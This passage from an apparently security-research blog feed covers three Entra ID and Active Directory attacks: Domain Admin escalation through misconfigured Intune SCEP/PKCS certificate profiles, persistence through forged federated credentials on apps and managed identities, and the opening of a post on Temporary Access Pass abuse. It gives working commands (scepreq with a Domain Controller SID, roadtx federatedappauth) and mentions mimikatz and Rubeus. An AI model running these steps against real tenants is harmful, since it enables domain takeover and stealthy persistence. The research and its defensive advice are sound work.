<p>Based on <a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pkca/01c4acb8-c366-4d31-93a5-fbf2d59c8b27">MS-PKCA section 3.1</a>, during PKINIT the certificate will need to be strongly mapped. Luckily for us there is a SAN URL tag specifically for Intune that we can use to ensure this: <code class="language-plaintext highlighter-rouge">URL=tag:microsoft.com,2022-09-14:sid:&lt;value&gt;</code>. In normal configurations this would be dynamically filled in for hybrid joined devices based on the SID that they have in AD, but we can also hard code it in the template. So in our new template, make sure to configure:</p>

<ul>
  <li>The subject (doesn’t really matter in this case).</li>
  <li>The DNS SAN mapping to the hostname of a Domain Controller.</li>
  <li>The URL SAN that includes the SID of the Domain Controller (can be queried with BloodHound, ldapdomaindump or any other LDAP tool).</li>
  <li>Make sure the EKUs include client authentication.</li>
</ul>

<p>In my case the final config looks like this:</p>

<p><img src="/assets/img/intune/pkcs-dc.png" alt="Intune PKCS configuration profile" class="align-center" /></p>

<p>Now we need to scope this to a device to actually issue the certificate. There are multiple approaches to this:</p>

<ul>
  <li>Scope it to a legitimate device that is in the same tenant.</li>
  <li>Enroll a Windows based virtual machine in Intune.</li>
  <li>Enroll a fake device with tools such as AADInternals or pytune (I have not tested how easy it is to extract the certs from their output).</li>
  <li>Use roadtune with a fake Intune device which supports both PKCS and SCEP certificates.</li>
</ul>

<p>While roadtune has (or will have actually from the next release) the most seamless support for this attack, it is currently not available as an open source tool but is part of the Outflank Security Tooling framework. If you have that, great, you can read more about the roadtune specific implementation in the roadtune documentation. But since I don’t want to promote commercial tooling in this blog I will stick with explaining the other flows here, with the primary focus on real Windows devices or VMs.</p>

<p>In this case I have an already enrolled VM that is in a group that I scope this configuration profile to:</p>

<p><img src="/assets/img/intune/intunescope.png" alt="Intune profile scope" class="align-center" /></p>

<p>It can take a while for the device to pick up the new policy or for Intune to actually start pushing it. Assume a delay of around 5-10 minutes (that is what I had in my test). The telemetry in Intune is quite slow so don’t rely on that. Since it may take a long time for the device to sync, it is better to trigger a manual sync until we see the certificate in the store:</p>

<p><img src="/assets/img/intune/manualsync.png" alt="Triggering a manual sync" class="align-center" /></p>

<p><img src="/assets/img/intune/adcs-cert.png" alt="Certificate in the computer certificate store" class="align-center" /></p>

<p><img src="/assets/img/intune/roguecert.png" alt="Certificate SANs mapping to a DC" class="align-center" /></p>

<p>Once the certificate is in the store, we can either export it out (and bypass the key export restrictions) using mimikatz, or we can use it directly with Rubeus by specifying the thumbprint. Note that Rubeus only searches in the user store, so if the certificate type was “device” you need to <a href="https://github.com/GhostPack/Rubeus/blob/d7a2506d4760e0618def29a108be10d726b4f260/Rubeus/lib/Ask.cs#L176">patch out</a> the store lookup to target the system cert store instead. We specify the certificate by its thumbprint.</p>

<p><img src="/assets/img/intune/rubeuscertesc.png" alt="Requesting a TGT with Rubeus" /></p>

<p>If we want to capture the certificate before it is stored in the store, we can actually see the PFX cert in the SyncML data as well. There is a super awesome tool to debug this called <a href="https://github.com/okieselbach/SyncMLViewer">SyncMLViewer</a> by Oliver Kieselbach that allows us to capture the SyncML messages via ETW. If we search for the PFX install message, which will contain the “PFXCertInstall” command, we find the PFX itself and it’s encrypted password:</p>

<p><img src="/assets/img/intune/syncml.png" alt="PFXCertInstall in the SyncML" /></p>

<p>Decrypting the PFX password requires using the Intune MDM cert and private key, and using that to decrypt the PKCS7/CMS encoded data blob, which gives the PFX password. Performing this is out of the scope of this blog but that would be an alternative to exporting the key out of the Windows certificate store.</p>

<p>Now that we have a TGT for a Domain Controller we have essentially compromised the on-prem domain.</p>

<p>If you have a SCEP configuration profile instead of a PKCS profile, we can use the same technique to issue the cert to a real device, alternatively we can also pick the required details out of the SyncML stream and use that with <code class="language-plaintext highlighter-rouge">scepreq</code> as explained further down in the blog.</p>

<h2 id="esc1-over-intune">ESC1 over Intune</h2>
<p>Now that we understand the general setup, let’s look at how we can achieve this without the modification of configuration profiles, for example from the point of a low-privileged user with an Intune license. Consider for example the following template:</p>

<p><img src="/assets/img/intune/weak-scep.png" alt="PFXCertInstall in the SyncML" /></p>

<p>This template puts the FQDN of our device as a SAN in the template. There are many variables that could be used here, as is reflected in the <a href="https://learn.microsoft.com/en-us/intune/intune-service/protect/certificates-pfx-configure#subject-name-format">Microsoft documentation</a>. What is important here is that some of these come from essentially untrusted / user controlled data. This will mostly be the case for “device” type certificates, since “user” certificates are usually based on Entra data such as a UPN, which can’t be modified by the user themselves.</p>

<p><em>There could be a corner case if the company is syncing Tier 0 AD users to Entra ID, which is against best practices. If you could compromise such an account it could also be used to request certificates. But that would be a corner case that likely requires similar privileges in the tenant as the scenario above.</em></p>

<p>Back to the device cert based scenario. Microsoft does call it out in the <a href="https://learn.microsoft.com/en-us/intune/intune-service/protect/certificates-pfx-configure#subject-name-format">documentation</a> that these parameters could be spoofed.</p>

<p><img src="/assets/img/intune/spoofwarning.png" alt="Warning against using these variables in the Microsoft documentation" /></p>

<p>So this is exactly what we will be doing in this case. Before strong mapping was required, this would have been quite easy since we only need to include the correct DNS or UPN SAN in our request. Now that <a href="https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16">strong mapping</a> is the default, that leaves us with two options:</p>

<ol>
  <li>If strong mapping is not enforced, aka the <a href="https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16#bkmk_kdcregkey">registry setting</a> <code class="language-plaintext highlighter-rouge">StrongCertificateBindingEnforcement</code> is set to 1, then we can use both PKCS and SCEP templates to request a certificate with a UPN or DNS name SAN that is attacker controlled.</li>
  <li>If strong mapping is enforced, which is the default currently and will be the only supported mode from September 2025, then we can only use SCEP templates to perform this elevation of privileges.</li>
</ol>

<p>Why SCEP? Because with PKCS, the entire flow is between Intune and the Certificate Connector, which means we cannot add the strong mapping. The KDC will not accept our certificate and throw an error if no strong mapping is present. With SCEP we can create our own CSR, and as long as the subject and SANs match with the values in the Intune configuration profile it turns out we can add the SID security extension to the certificate with an arbitrary SID, this will pass the validation.</p>

<p>To sum up the requirements:</p>

<ul>
  <li>We need to have a SCEP certificate that is configured for client auth and allows the Digital Signature key usage (this will be the case in most deployments).</li>
  <li>The certificate should have a SAN mapping that uses user-controlled or modifiable data. Examples are given below. This is what makes the configuration actually vulnerable and what should be mitigated if you are using such a configuration in production.</li>
  <li>We need to have a device that is in scope of this configuration profile.</li>
</ul>

<p>There are a few challenges here:</p>
<ul>
  <li>Intune does not by default allow regular users to view the configuration profiles. If we want to determine the actual configuration we would need to have a role assigned like Global Reader. An alternative, if one has access to a legitimate device, is to look at the certificates installed on the device. If the SAN is constructed from something that is user controllable, such as the device name or serial number, it can be abused.</li>
  <li>If we do this with a device that is in scope of the real policy, we can modify the configuration on-device. Doing that however will require figuring out where the device is getting these values from and then replace them either on disk, in memory or in the registry. For a fake device this is easier since we can just change the device parameters in the enrollment profile data.</li>
</ul>

<p>Some abusable configurations in SANs are:</p>
<ul>
  <li>Having a DNS SAN with <code class="language-plaintext highlighter-rouge">{{DeviceName}}</code>. The device name can be configured as an FQDN, though Windows will not allow you to do so in the UI. Intune accepts these names without issue.</li>
  <li>Having a DNS SAN with <code class="language-plaintext highlighter-rouge">{{DeviceName}}.companydomain.com</code>. In this case we only need to spoof the first part, which we can do by renaming the real device.</li>
  <li>Having a configuration as above, but then with <code class="language-plaintext highlighter-rouge">{{IMEI}}</code> or <code class="language-plaintext highlighter-rouge">{{SerialNumber}}</code>. I don’t know where real Windows devices source this information from, so you’d have to figure that out yourself, or enroll a fake device.</li>
</ul>

<p>Examples of configurations that are not vulnerable:</p>
<ul>
  <li>Having a DNS SAN with <code class="language-plaintext highlighter-rouge">{{DeviceName}}.companydomain.com</code>, if the domain does <strong>not match</strong> the on-premises domain name.</li>
  <li>Using a SAN with data source from Entra / Intune that is automatically generated, such as <code class="language-plaintext highlighter-rouge">AAD_Device_ID</code> or <code class="language-plaintext highlighter-rouge">DeviceId</code></li>
</ul>

<p>I have not figured out yet where <code class="language-plaintext highlighter-rouge">{{FullyQualifiedDomainName}}</code> is sourced from, it may be that this only exists on hybrid joined devices.</p>

<p>In this walkthrough we will explore the simplest configuration, where there is a SCEP cert that has a SAN based on the device name and a domain suffix that matches with on-prem AD.</p>

<p><img src="/assets/img/intune/scep-vuln-example.png" alt="Vulnerable SCEP template" /></p>

<p>Let’s rename our device to match a Domain Controller name:</p>

<p><img src="/assets/img/intune/rename-pc.png" alt="Vulnerable SCEP template" class="align-center" /></p>

<p>We also run the <a href="https://github.com/okieselbach/SyncMLViewer">SyncMLViewer</a> tool to watch the SyncML traffic, since we will use this to capture the traffic. What we are looking for are SyncML nodes with the <code class="language-plaintext highlighter-rouge">ClientCertificateInstall/SCEP</code> URI. These will contain the data for our SCEP enrollment. Once we trigger the sync with the new name we should see the data.</p>

<p><img src="/assets/img/intune/syncml-scep.png" alt="SCEP enrollment data" /></p>

<p>This contains everything we need to use <a href="https://github.com/dirkjanm/scepreq">scepreq</a> to talk to the NDES service. Scepreq is a new tool that I’m releasing with this blog. It is essentially a modified fork of <a href="https://github.com/bikram990/PyScep">PyScep</a> with a command line wrapper and extensions for AD CS and Intune specific certificate requests. The structures for custom SANs and security extensions are borrowed from <a href="https://github.com/ly4k/Certipy">Certipy</a>.</p>

<p>We will need:</p>

<ul>
  <li>The <code class="language-plaintext highlighter-rouge">ServerURL</code>, which contains the SCEP endpoint.</li>
  <li>The <code class="language-plaintext highlighter-rouge">Challenge</code>, which is used in SCEP as a password. The challenge is valid for an hour after it is issued.</li>
  <li>The <code class="language-plaintext highlighter-rouge">EKUMapping</code>, which should at least contain client authentication (<code class="language-plaintext highlighter-rouge">1.3.6.1.5.5.7.3.2</code>), or the “any purpose” EKU.</li>
  <li>The <a href="https://learn.microsoft.com/en-us/windows/client-management/mdm/clientcertificateinstall-csp#devicescepuniqueidinstallkeyusage">key usage</a>. The values are from <code class="language-plaintext highlighter-rouge">X509KeyUsageFlags</code> <a href="https://learn.microsoft.com/en-us/windows/win32/api/certenroll/ne-certenroll-x509keyusageflags">defined in certenroll.h</a>. Most of the time it will be 160 in decimal which means both “digital signature” and “key encipherment”.</li>
  <li>The <code class="language-plaintext highlighter-rouge">SubjectName</code> for the cert.</li>
  <li>The <code class="language-plaintext highlighter-rouge">SubjectAlternativeNames</code> to use. These have a bit of a <a href="https://learn.microsoft.com/en-us/windows/client-management/mdm/clientcertificateinstall-csp#devicescepuniqueidinstallsubjectalternativenames">weird format</a> with the comment in the documentation “Refer name type definition in MSDN”. The format is as follows: <code class="language-plaintext highlighter-rouge">[nameformat1]+[actual name1];[name format 2]+[actual name2]</code>, where the nameformat is a number. I did manage to find the documentation for these numbers, they <a href="https://learn.microsoft.com/en-us/windows/win32/api/certenroll/ne-certenroll-alternativenametype">match to constants</a> from the <code class="language-plaintext highlighter-rouge">AlternativeNameType</code> enum in <code class="language-plaintext highlighter-rouge">certenroll.h</code>.</li>
  <li>The SID from our victim, the Domain Controller, queried as in the first scenario in this blog.</li>
</ul>

<p>If we take all that we can pass it to <code class="language-plaintext highlighter-rouge">scepreq</code>. Note that most of these values are actually case sensitive!</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>scepreq -u https://s25-ndes.hybrid.iminyour.cloud/certsrv/mscep/mscep.dll -p &lt;challenge&gt; --dns HYBRID-DC.hybrid.iminyour.cloud -s 'CN=c711a89b-7b82-4d84-bfa2-040d03057ee5' --sid S-1-5-21-1414223725-1888795230-1473887622-1000
</code></pre></div></div>

<p>If all succeeds we get a certificate. If not, there is unfortunately zero error information that NDES will give to use as of why this failed. It will be in the Event logs on the NDES server, but that is not a source of information that we can see in this scenario. Anyway, if all goes well it should look like this:</p>

<p><img src="/assets/img/intune/scepreq.png" alt="SCEP enrollment success" /></p>

<p>Once we have the certificate we can request a TGT with <a href="https://github.com/dirkjanm/PKINITtools">PKINITtools</a>, Certipy or Rubeus:</p>

<p><img src="/assets/img/intune/gettgtpkinit.png" alt="Requesting a TGT with PKINITtools" /></p>

<p>And once again we have a TGT for a Domain Controller, elevating our privileges to Domain Admin.</p>

<h2 id="challenges-and-mitigations">Challenges and mitigations</h2>
<p>In this case the starting point was a Windows device on which we had Administrator access so that we could spoof the correct variables and abuse the template. If it is not such an easy example as above, it would be more complex to spoof the correct identifier (such as a serial number) on a real device. Getting a fake device enrolled with either a tool or as a VM would work, but then usually corporate device enrollment limitations would apply, often enforced through Autopilot. There is some discussion about whether Autopilot and the registration of hardware IDs is actually a security feature or more of an accidental security barrier for attackers. I see it as a feature that will often stop attackers from enrolling fake devices, though I don’t think it is intended this way.</p>

<p>In any case, the important message here is that Intune administrators should avoid using spoofable identifiers in certificate profiles. And of course be aware that when someone obtains Intune Administrator or Global Administrator and also has access to the AD network, it is pretty much game over.</p>

<p>As far as detection goes, the usual AD CS certificate abuse detection advice would apply, and hopefully some security product or custom detection rule will alert on certificates being issued for Domain Admins or Domain Controllers, or TGTs requested for them with a certificate if this is not normally something they do.</p>

<h2 id="tools">Tools</h2>
<p>The scepreq tool is available on <a href="https://github.com/dirkjanm/scepreq">GitHub</a>. If you want to do this with roadtune, expect a new release soon which includes PKCS extraction capabilities and automatic SCEP enrollment based on configurations that are pushed from Intune.</p>

<p>Lastly a shout-out to Rudy Ooms, whose <a href="https://call4cloud.nl">documentation on all the Intune things</a> was extremely valuable while developing the Intune related protocols.</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[Active Directory Certificate Services (AD CS) attack surface is pretty well explored in Active Directory itself, with *checks notes* already 16 “ESC” attacks being publicly described. Hybrid certificate attack paths have not gained that much attention yet, though I have come across several hybrid integrations while reviewing cloud configurations. In these setups, certificates are rolled out to cloud-managed endpoints via Microsoft Intune and the Intune certificate connector. The certificate connector runs in on-premises AD and requests the certificates on AD CS via the SCEP or PKCS integrations. In such environments, it would be possible to request certificates with arbitrary subjects as an Intune administrator. What I have also observed in some cases are certificate configurations in Intune being misconfigured in a way that would allow regular users to perform the same attack and effectively perform ESC1 over Intune certificates. That means going from regular user and their endpoint to Domain Admin in AD, all from the cloud. This blog explores the scenarios where this is possible and provides exploitation and remediation guidance.]]></summary></entry><entry><title type="html">Persisting on Entra ID applications and User Managed Identities with Federated Credentials</title><link href="https://dirkjanm.io/persisting-with-federated-credentials-entra-apps-managed-identities/" rel="alternate" type="text/html" title="Persisting on Entra ID applications and User Managed Identities with Federated Credentials" /><published>2024-07-31T18:00:57+00:00</published><updated>2024-07-31T18:00:57+00:00</updated><id>https://dirkjanm.io/persisting-with-federated-credentials-entra-apps-managed-identities</id><content type="html" xml:base="https://dirkjanm.io/persisting-with-federated-credentials-entra-apps-managed-identities/"><![CDATA[<p>Using applications and service principals for persistence and privilege escalation is a well-known topic in Entra ID (Azure AD). I’ve <a href="/azure-ad-privilege-escalation-application-admin/">written about</a> these kind of attacks many years ago, and talked about how we can use certificates and application passwords to authenticate as applications and abuse the permissions they have. In this blog, we cover a third way of authenticating as an application: using federated credentials. Federated credentials have been around for a few years, but haven’t been covered much yet from the offensive side. For Entra ID applications, there is no large difference between configuring federated credentials or regular client secrets/certificates. The more interesting part on this topic is that we can also configure federated credentials on User Managed Identities in Azure. This is unusual, because normally Managed Identities have their authentication controlled by Microsoft, and their authentication is tied to a certain resource such as a Virtual Machine. With federated credentials, we can bypass that limitation, given that we have sufficient privileges, and authenticate as this managed identity without requiring access to another resource in Azure. With this blog I’m also introducing a new utility to the ROADtools family: roadoidc, which can set up a minimal Identity Provider (IdP), allowing us to authenticate using federated credentials as apps and user managed identities with roadtx.</p>

<h1 id="federated-credentials-concept">Federated credentials concept</h1>
<p>The idea behind federated credentials is that you can choose to trust some other Identity Provider (IdP) to authenticate your apps. This solves for example manual credential management on workloads that run outside of Azure, where Managed Identities are unavailable. An example of this is that you can use federated credentials in GitHub actions. This would allow a specific pipeline or pipelines from the same repository to access a workload identity without needing certificates or passwords configured in the pipeline definition. The concept of federated identities in Entra and Azure documented <a href="https://learn.microsoft.com/en-us/entra/workload-id/workload-identity-federation">here</a>.</p>

<p>On a protocol level, federated credentials use OpenID Connect (OIDC) as a way of establishing a trust between Entra and another IdP. The protocol is <a href="https://openid.net/specs/openid-connect-core-1_0.html">standardized</a> and is commonly used to let applications trust Entra ID as an IdP, but in this case we use it as a way for Entra ID to trust a third-party IdP. Once the IdP is configured as a trusted token issuer, Entra will query the <code class="language-plaintext highlighter-rouge">.well-known/openid-configuration</code> endpoint <a href="https://openid.net/specs/openid-connect-discovery-1_0.html">as specified in the OpenID Connect discovery protocol</a>. This configuration document also points us to the trusted keys with which ID tokens must be signed.</p>

<h1 id="creating-our-own-minimal-idp">Creating our own minimal IdP</h1>
<p>The idea behind using federated credentials is that we trust a well-known platform such as GitHub, AWS or GCP. But we can also roll our own IdP with our own keys, as long as we can host them somewhere Entra ID can reach them. At the minimum, we need two files:</p>

<ul>
  <li>The OpenID Provider Configuration file at <code class="language-plaintext highlighter-rouge">.well-known/openid-configuration</code>.</li>
  <li>The keys document linked in the <code class="language-plaintext highlighter-rouge">jwks_uri</code> property of the Provider Configuration file.</li>
</ul>

<p>The keys document contains a public key and/or certificate that we can use to sign our tokens. The certificate is optional in this deployment, a public/private RSA or EC keypair is sufficient to make it work. The certificate that we want to use can be self-signed, so we don’t need to involve a Certificate Authority. I’ll show you later how we can generate the keys and configuration with roadoidc, but let us assume for now that we have these files hosted on <code class="language-plaintext highlighter-rouge">https://roadoidcapp.azurewebsites.net</code>. This site will then become the <code class="language-plaintext highlighter-rouge">issuer</code> of our tokens.</p>

<h1 id="configuring-federated-credentials-on-applications-and-user-managed-identities">Configuring federated credentials on applications and user managed identities</h1>
<p>We can configure the federated credential on applications in the tenant we want to target. The permissions here are identical to the permissions you would normally need to configure certificates or passwords on applications, so you would need one of the following:</p>

<ul>
  <li>Global Administrator (doh)</li>
  <li>(Cloud) Application administrator</li>
  <li>Owner privileges over the app</li>
  <li><em>Application.ReadWrite.All</em> or <em>Directory.ReadWrite.All</em> Microsoft Graph permissions</li>
</ul>

<p>We can then configure the federated credentials on an application as follows:</p>

<p><img src="/assets/img/oidc/federatedcredentials-app.png" alt="Configuring federated credentials on an app" /></p>

<p>The <code class="language-plaintext highlighter-rouge">issuer</code> should be <code class="language-plaintext highlighter-rouge">https://roadoidcapp.azurewebsites.net</code> since this is where our keys are hosted. The <em>subject identifier</em> and <em>audience</em> could be anything since we can put arbitrary strings in our tokens, so just pick something nice or leave it at the default. We can achieve the same with the <a href="https://learn.microsoft.com/en-us/graph/api/application-post-federatedidentitycredentials?view=graph-rest-1.0&amp;tabs=http">Microsoft Graph API</a>, if preferred over the portal. What is interesting, is that while technically the <code class="language-plaintext highlighter-rouge">federatedIdentityCredentials</code> property also exists on Service Principals, the Microsoft Graph API does not allow us to configure these credentials there, stating that it is not supported.</p>

<h2 id="user-managed-identities">User Managed identities</h2>
<p>On User Managed identities this concept is more interesting, since we don’t normally manage credentials ourselves on them. In fact, for certificates and password credentials this is not even possible, Microsoft prohibits us from modifying these properties on the service principal representing the managed identity in Entra ID. We can however manage their federated credentials, granted that we have <code class="language-plaintext highlighter-rouge">Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write</code> permissions that come with the following built-in Azure RBAC roles:</p>

<ul>
  <li>Contributor / Owner</li>
  <li>Managed Identity Contributor</li>
  <li>Azure Red Hat OpenShift Federated Credential Role</li>
</ul>

<p>With these permissions, we can configure the federated credentials on the user managed identity, and authenticate to it from anywhere without needing to link the identity to a resource and having access to that resource. Note that this attack is only possible on User Managed Identities, not on System Managed Identities, since these are tied to a resource and don’t allow federated credential configuration.</p>

<p><img src="/assets/img/oidc/federatedcredentials-managed-identity.png" alt="Configuring federated credentials on an app" /></p>

<h1 id="creating-an-openid-connect-provider-with-roidoidc">Creating an OpenID connect provider with roidoidc</h1>
<p>Before we authenticate we need to host the OpenID Connect provider configuration and the public keys somewhere Entra ID can reach them. In this case I’m hosting them as an Azure App Service, but any file host will do, including Azure Blob storage or S3 (which would be cheaper than Azure App Service). I’ve added some alternative hosting instructions in the <a href="https://github.com/dirkjanm/ROADtools/tree/master/roadoidc">roadoidc readme</a>, but the first commands would be the same.</p>

<p>We need to generate the configuration for our environment with the <code class="language-plaintext highlighter-rouge">genconfig.py</code> file, found in the <code class="language-plaintext highlighter-rouge">roadoidc</code> directory of <a href="">ROADtools</a>. I suggest cloning the repository locally after install roadtx and roadrecon, which contain all the dependencies for roadoidc as well. In my case I will be running the app at <code class="language-plaintext highlighter-rouge">roidoidcapp.azurewebsites.net</code>, which means that becomes my issuer parameter.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python3 genconfig.py -c testconfig.py -i https://roadoidcapp.azurewebsites.net
Saving private key to roadoidc.key
Saving certificate to roadoidc.pem
Key ID: 54XPuTfyhvtuy94A6g2YjiL3Rx8=
Saving configuration to testconfig.py
</code></pre></div></div>

<p>Now move the config to the <code class="language-plaintext highlighter-rouge">flaskapp</code> folder so we can deploy it on Azure App Service. We can upload the app using the Azure CLI, optionally specifying the subscription to deploy to and/or an existing app service plan. The command below will create a new app service plan with the cheapest B1 tier:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mv testconfig.py flaskapp/app_config.py
cd flaskapp/
az webapp up -n roadoidcapp --sku B1
</code></pre></div></div>

<p>Once the webapp is up, verify we can reach the discovery document at <code class="language-plaintext highlighter-rouge">https://yourapp.azurewebsites.net/.well-known/openid-configuration</code>. If that works we can now authenticate to the app or user managed identity that we configured the federated credentials on.</p>

<h1 id="authenticating-with-federated-credentials-and-roadtx">Authenticating with federated credentials and roadtx</h1>
<p>Make sure you have the latest version of roadtx installed. We need to specify quite a few parameters to authenticate with federated credentials and roadtx:</p>

<ul>
  <li>The <strong>client ID</strong> of the application or user managed identity (<code class="language-plaintext highlighter-rouge">-c</code>)</li>
  <li>The <strong>tenant</strong> we want to authenticate to. Either as tenant ID or as one of the domains of the tenant (<code class="language-plaintext highlighter-rouge">-t</code>)</li>
  <li>The <strong>scope</strong> of the token we want to have, for example <code class="language-plaintext highlighter-rouge">https://graph.microsoft.com/.default</code> (<code class="language-plaintext highlighter-rouge">-s</code>)</li>
  <li>The <strong>issuer</strong> that we configured in the previous stap (<code class="language-plaintext highlighter-rouge">-i</code>)</li>
  <li>The certificate and/or key that we created (<code class="language-plaintext highlighter-rouge">--cert-pem</code> and <code class="language-plaintext highlighter-rouge">--key-pem</code>)</li>
  <li>The <strong>subject</strong> that we configured in the federated credential configuration (<code class="language-plaintext highlighter-rouge">--subject</code>)</li>
  <li>An optional <strong>audience</strong> if you changed it in the federated credential configuration (<code class="language-plaintext highlighter-rouge">--audience</code>)</li>
  <li>An optional <strong>key id</strong> if you chose a custom one when generating the IdP config (<code class="language-plaintext highlighter-rouge">--kid</code>)</li>
</ul>

<p>In my case, the command would be as follows:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx federatedappauth -c 8a2c36aa-66fb-46cd-9b2d-b94a4945e0a9 --cert-pem roadoidc.pem --key-pem roadoidc.key --subject testapp -t iminyour.cloud --issuer https://roadoidcapp.azurewebsites.net/ -s https://graph.microsoft.com/.default 
</code></pre></div></div>

<p>This will request a token using the client credentials grant flow, using a federated assertion instead of a certificate based assertion, which is <a href="https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-client-creds-grant-flow#third-case-access-token-request-with-a-federated-credential">somewhat documented</a> in the Identity Platform documentation. The output of this command will be an access token in the <code class="language-plaintext highlighter-rouge">.roadtools_auth</code> file.</p>

<h1 id="conclusion">Conclusion</h1>
<p>This blog shows an alternative approach attackers can use to configure credentials on Entra ID applications and Azure User Managed Identities. It can help them persist in environments or even elevate privileges if they can compromise a service principal with high privileges. Federated Credentials can come from well-known identity providers, but we can also create our own minimal IdP to avoid being limited to a platform such as GitHub for our token requests. Defenders should be aware of this possibility and monitor for unexpected federated credential that are configured on User Managed Identities and Entra ID applications. Thomas Naunheim wrote a <a href="https://www.cloud-architekt.net/identify-prevent-abuse-uami-fedcreds/">great blog with defensive guidance</a> on this same topic.</p>

<p>The tool that you can use to create your own IdP is available in the <a href="https://github.com/dirkjanm/ROADtools">ROADtools</a> repository on GitHub in the <a href="https://github.com/dirkjanm/ROADtools/tree/master/roadoidc">roadoidc directory</a>.</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[Using applications and service principals for persistence and privilege escalation is a well-known topic in Entra ID (Azure AD). I’ve written about these kind of attacks many years ago, and talked about how we can use certificates and application passwords to authenticate as applications and abuse the permissions they have. In this blog, we cover a third way of authenticating as an application: using federated credentials. Federated credentials have been around for a few years, but haven’t been covered much yet from the offensive side. For Entra ID applications, there is no large difference between configuring federated credentials or regular client secrets/certificates. The more interesting part on this topic is that we can also configure federated credentials on User Managed Identities in Azure. This is unusual, because normally Managed Identities have their authentication controlled by Microsoft, and their authentication is tied to a certain resource such as a Virtual Machine. With federated credentials, we can bypass that limitation, given that we have sufficient privileges, and authenticate as this managed identity without requiring access to another resource in Azure. With this blog I’m also introducing a new utility to the ROADtools family: roadoidc, which can set up a minimal Identity Provider (IdP), allowing us to authenticate using federated credentials as apps and user managed identities with roadtx.]]></summary></entry><entry><title type="html">Lateral movement and on-prem NT hash dumping with Microsoft Entra Temporary Access Passes</title><link href="https://dirkjanm.io/lateral-movement-and-hash-dumping-with-temporary-access-passes-microsoft-entra/" rel="alternate" type="text/html" title="Lateral movement and on-prem NT hash dumping with Microsoft Entra Temporary Access Passes" /><published>2024-05-06T13:00:57+00:00</published><updated>2024-05-06T13:00:57+00:00</updated><id>https://dirkjanm.io/lateral-movement-and-hash-dumping-with-temporary-access-passes-microsoft-entra</id><content type="html" xml:base="https://dirkjanm.io/lateral-movement-and-hash-dumping-with-temporary-access-passes-microsoft-entra/"><![CDATA[<p>Temporary Access Passes are a method for Microsoft Entra ID (formerly Azure AD) administrators to configure a temporary password for user accounts, which will also satisfy Multi Factor Authentication controls. They can be a useful tool in setting up passwordless authentication methods such as FIDO keys and Windows Hello. In this blog, we take a closer look at the options attackers have to abuse Temporary Access Passes for lateral movement, showing how they can be used for passwordless persistence and even to recover on-premises Active Directory passwords in certain hybrid configurations.</p>

<p>Temporary access passes are not enabled by default. However, many tenants that primarily use passwordless forms of authentication have them enabled to allow users to configure passwordless authentication methods for the first time, or for account recovery in the case these users need to reset their authentication methods. For attackers, Temporary Access Passes (TAPs) also provide interesting options, since these temporary passwords exist next to the users regular password, which means configuring a TAP on an account is not a destructive action like resetting the account password. The abuse of TAPs by itself is not new, there are already some great blogs that explore this concept, such as <a href="https://posts.specterops.io/id-tap-that-pass-8f79fff839ac">this blog</a> by <a href="https://twitter.com/hotnops">Daniel Heinsen from SpecterOps</a>.</p>

<p>After I read Daniel’s blog a while ago, I started playing with these TAPs to see if I could also utilize them with ROADtools to request tokens and what the limitations on those tokens would be. Since TAPs can be used to configure passwordless authentication methods, it shouldn’t be a surprise that we can also use them to configure Windows Hello for Business keys on accounts, which was added to ROADtools after my Windows Hello talks <a href="/talks/">last year</a>. I’ll describe the steps for this below. What I found more interesting during my research, is that TAPs can be used for lateral movement in hybrid environments as well, where the use of a TAP in Entra would allow the attacker to authenticate in the on-premises Active Directory. It would even allow the attacker to recover the NT hash of the victim account, which might be used to recover the plain text password of the victim account. The hybrid lateral movement part is only applicable if Cloud Kerberos Trust is used, which gives Entra ID the ability to issue Kerberos tickets for on-prem identities.</p>

<h2 id="configuring-taps">Configuring TAPs</h2>
<p>Temporary Access Passes can be configured by admins, provided that the feature is enabled and the admin has sufficient rights to do so. The requirements and methods are quite clearly laid out in the <a href="https://learn.microsoft.com/en-us/entra/identity/authentication/howto-authentication-temporary-access-pass#create-a-temporary-access-pass">TAP documentation</a> from Microsoft. We can also do it over the Microsoft Graph Rest API, however that would require that we have a token with the <code class="language-plaintext highlighter-rouge">UserAuthenticationMethod.ReadWrite.All</code> delegated permissions. Unfortunately for us, there aren’t any built-in Microsoft apps that I’m aware of that have this kind of access, so our best bet is to use the Azure/Entra portal or to borrow a token from that portal and use that with PowerShell or the <a href="https://learn.microsoft.com/en-us/graph/api/authentication-post-temporaryaccesspassmethods?view=graph-rest-1.0&amp;tabs=http#request">REST API</a>. In this case we’ll stick to the Azure Portal to configure the temporary access pass.</p>

<p><img src="/assets/img/tap/tap_configure.png" alt="Configuring a TAP" /></p>

<p>Temporary Access Passes act as alternative credentials for the user, which means that we can use them while the legitimate user is not interrupted, which is a big advantage over destructive actions like password resets, which will invalidate the users current sessions and likely cause some complaints. Since the TAP also counts as MFA, we don’t need to worry about them receiving notifications or text messages from MFA prompts either. Now that we have a TAP, lets see what we can do to convert this into persistent access.</p>

<h2 id="abusing-the-tap-for-lateral-movement">Abusing the TAP for lateral movement</h2>
<p>The TAP itself is only valid during the configured lifetime. While we can influence this when creating the TAP, a longer validity might also be suspicious, because the TAP automatically becomes the preferred authentication method during its lifetime. To minimize the chance of the legitimate user being prompted for the TAP, we can make its lifetime as short as possible, or allow it to only be used once.</p>

<h3 id="configuring-windows-hello-for-business-keys-with-a-tap">Configuring Windows Hello for Business keys with a TAP</h3>
